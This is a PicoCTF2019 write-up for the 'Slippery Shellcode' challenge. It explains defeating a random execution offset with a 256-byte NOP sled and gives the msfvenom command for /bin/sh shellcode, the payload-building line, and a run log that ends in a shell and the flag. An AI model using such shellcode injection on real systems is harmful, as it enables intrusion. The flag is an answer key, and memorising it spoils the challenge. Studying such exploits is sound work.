Rating:
# Slippery Shellcode | PicoCTF2019
## Problem
This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/slippery-shellcode_4_64839254839978b32eb661ca92071d48 on the shell server.
## Solution
### 1. Read the code to understand what's going on
Can see that it's calling the vuln function from a random location, as determined by an offset value. Because of this we can no longer rely on a constant offset to place our shellcode at. However, the offset will be a number with a maximum of 256.
```bash
puts("Enter your shellcode:");
vuln(buf);
puts("Thanks! Executing from a random location now...");
int offset = (rand() % 256) + 1;
((void (*)())(buf+offset))();
```
### 2. Construct the payload
We can use a NOP sled to make sure the control always passes to the shellcode. This means giving 256 NOP instructions followed by the payload.
The shellcode payload we can generate using msfvenom, just appending a print statement to ensure the 256 NOP bytes go before it.
```bash
kali@kali:~/Desktop$ msfvenom --arch x86 --platform linux -p linux/x86/exec CMD=/bin/sh -e generic/none -f python -o payload
kali@kali:~/Desktop$ echo "print('\x90' * 256 + buf)" >> payload
```
We now have a script we can run to produce the payload, which is then supplied to the binary. We also follow the payload by the cat program, which keeps the process open.
### 3. Claim the flag
On the server we recreate this script just by copy-pasting the code into a file, and then we can run it to get the flag.
```bash
$ (python payload; cat) | ./vuln
Enter your shellcode:
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1���
Qh//shh/bin��̀
Thanks! Executing from a random location now...
ls
flag.txt vuln vuln.c
cat flag.txt
picoCTF{sl1pp3ry_sh311c0d3_3d79d4df}
```